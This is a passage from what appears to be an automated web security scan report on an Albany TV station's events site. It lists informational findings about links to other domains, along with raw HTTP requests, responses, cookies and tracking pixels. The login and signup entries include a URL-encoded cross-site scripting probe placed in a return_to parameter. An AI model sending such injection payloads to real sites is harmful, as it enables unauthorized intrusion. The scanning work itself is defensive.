http://ads.bluelithium.com/pixel?id=883607&t=2
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/images/ico_add.gif?65617
http://js.zvents.com/images/icons/ico_tix.gif?65617
http://js.zvents.com/images/icons/orange_ff.gif?65617
http://js.zvents.com/images/icons/orange_pause.gif?65617
http://js.zvents.com/images/icons/orange_play.gif?65617
http://js.zvents.com/images/icons/orange_rev.gif?65617
http://js.zvents.com/images/reminder_icon.gif?65617
http://js.zvents.com/javascripts/happy_default.js?65617
http://js.zvents.com/stylesheets/happy_default.css?65617
http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617
http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif
http://www.freedom.com/eula.html
http://www.freedom.com/privacy.html
http://www.omniture.com/
http://www.zvents.com/albany-ny/events
http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=
http://www.zvents.com/images/internal/2/3/2/7/img_287232_thumb.jpg?resample_method=resized
http://www.zvents.com/images/internal/5/2/3/8/img_8188325_primary.jpg?resample_method=
http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=
http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled
http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled
http://www.zvents.com/images/internal/7/6/5/8/img_348567_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized
https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=
https://secure.adnxs.com/seg?add=87103&t=2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "3438eef8566da91c0a816f482d081bc2"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Thu, 28-Apr-2011 17:37:18 GMT; HttpOnly
Content-Length: 50101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>

<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>

<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">


<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />

...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
<a id="rotation_prev" href="#"><img alt="Previous event" src="http://js.zvents.com/images/icons/orange_rev.gif?65617" title="Previous event" /></a>
...[SNIP]...
pt:void(0)" id="featured_rotation_pause" onclick="$ZJQuery('#featured_rotation').cycle('pause'); $ZJQuery('#featured_rotation_play').show(); $ZJQuery('#featured_rotation_pause').hide(); return false;"><img alt="Pause event slideshow" src="http://js.zvents.com/images/icons/orange_pause.gif?65617" title="Pause event slideshow" /></a>
...[SNIP]...
ed_rotation_play" onclick="$ZJQuery('#featured_rotation').cycle('resume'); $ZJQuery('#featured_rotation_play').hide(); $ZJQuery('#featured_rotation_pause').show(); return false;" style="display: none"><img alt="Resume event slideshow" src="http://js.zvents.com/images/icons/orange_play.gif?65617" title="Resume event slideshow" /></a>
<a id="rotation_next" href="#"><img alt="Next event" src="http://js.zvents.com/images/icons/orange_ff.gif?65617" title="Next event" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/139733045-pink-floyd-experience" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:139733045', false, this)"><img alt="Pink Floyd Experience" src="http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155300665-celtic-woman" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:155300665', false, this)"><img alt="Celtic Woman" src="http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/147270025-glenn-beck" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:147270025', false, this)"><img alt="Glenn Beck" src="http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/142549185-lisa-lampanelli" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:142549185', false, this)"><img alt="Lisa Lampanelli" src="http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:148455425', false, this)"><img alt="Sesame Street Live Elmos Green Thumb" src="http://www.zvents.com/images/internal/5/2/3/8/img_8188325_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/151637365-riverdance" onclick="return Zvents.tracker.notifyFeaturedClick('event:151637365', false, this)"><img alt="Riverdance" border="0" src="http://www.zvents.com/images/internal/7/6/5/8/img_348567_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/154912025-mike-epps-and-friends" onclick="return Zvents.tracker.notifyFeaturedClick('event:154912025', false, this)"><img alt="Mike Epps And Friends" border="0" src="http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour" onclick="return Zvents.tracker.notifyFeaturedClick('event:155222925', false, this)"><img alt="Keith Urban - Get Closer 2011 World Tour" border="0" src="http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/152086945-harlem-globetrotters" onclick="return Zvents.tracker.notifyFeaturedClick('event:152086945', false, this)"><img alt="Harlem Globetrotters" border="0" src="http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab" onclick="return Zvents.tracker.notifyFeaturedClick('event:161856385', false, this)"><img alt="A very special acoustic & electric evening with Trey Anastasio & TAB" border="0" src="http://www.zvents.com/images/internal/2/3/2/7/img_287232_thumb.jpg?resample_method=resized" /></a>
...[SNIP]...
733045-pink-floyd-experience" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:139733045'
, 1, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ow/142549185-lisa-lampanelli" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:142549185'
, 2, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/147270025-glenn-beck" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:147270025'
, 3, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
treet-live-elmos-green-thumb" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:148455425'
, 4, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/151637365-riverdance" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:151637365'
, 5, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
2086945-harlem-globetrotters" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:152086945'
, 6, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/162869785'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/163938585'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/164180885'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.187. http://events.cbs6albany.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://events.cbs6albany.com/search?city=Albany&st=event

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=883607&t=2
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/images/ico_add.gif?65617
http://js.zvents.com/images/icons/ico_tix.gif?65617
http://js.zvents.com/javascripts/happy_default.js?65617
http://js.zvents.com/stylesheets/happy_default.css?65617
http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617
http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif
http://www.freedom.com/eula.html
http://www.freedom.com/privacy.html
http://www.omniture.com/
http://www.zvents.com/albany-ny/events
https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=
https://secure.adnxs.com/seg?add=87103&t=2

Request

GET /search?city=Albany&st=event HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:39:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 324
ETag: "ab5a3071ee3ad0868c747506099c1399"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ECIJY2l0eSILQWxiYW55IgtyYWRpdXNpNyINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0FsYmFueSwgTlkiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy03My43NTUwOTk5OTk5OTk5OTkATWoiEXdoZXJlX3N0cmluZ0AZIgpzdGF0ZSIHTlk%3D--d0710e9458c36d53e23b3e7a161be20e00b58652; path=/; expires=Fri, 29-Apr-2011 05:39:06 GMT; HttpOnly
Content-Length: 49568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>

<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>

<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">


<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />

...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
yd-experience" class="serp_click_1 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:139733045', '1', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
65-riverdance" class="serp_click_2 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:151637365', '2', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
11-world-tour" class="serp_click_3 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:155222925', '3', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
25-glenn-beck" class="serp_click_4 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:147270025', '4', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
sa-lampanelli" class="serp_click_5 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:142549185', '5', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
s-green-thumb" class="serp_click_6 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:148455425', '6', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
-celtic-woman" class="serp_click_7 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:155300665', '7', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
s-and-friends" class="serp_click_8 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:154912025', '8', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
anastasio-tab" class="serp_click_9 event_detail_link sc-serp-buytixico" name="&lid=serpClick&lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:161856385', '9', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.188. http://events.cbs6albany.com/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/user/login

Issue detail

The page was loaded from a URL containing a query string:

http://events.cbs6albany.com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1

The response contains the following link to another domain:

https://secure.zvents.com/elx/events_cbs6albany_com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=b71a65ab3c5801c999573056dcd1eff9::f18e24d227addce5e2c56a738c0710b8

Request

GET /user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:37:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
Location: https://secure.zvents.com/elx/events_cbs6albany_com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=b71a65ab3c5801c999573056dcd1eff9::f18e24d227addce5e2c56a738c0710b8
X-Runtime: 5
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:37:32 GMT; HttpOnly
Content-Length: 298

<html><body>You are being <a href="https://secure.zvents.com/elx/events_cbs6albany_com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=b71a65ab3c5801c999573056dcd1eff9::f18e24d227addce5e2c56a738c0710b8">redirected</a>
...[SNIP]...

17.189. http://events.cbs6albany.com/user/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/user/signup

Issue detail

The page was loaded from a URL containing a query string:

http://events.cbs6albany.com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1

The response contains the following link to another domain:

https://secure.zvents.com/elx/events_cbs6albany_com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=6f4282717780dcc19a72c2c0ec55f078::1ed9edb1f0b57dc67f45ebdf738c5ace

Request

GET /user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
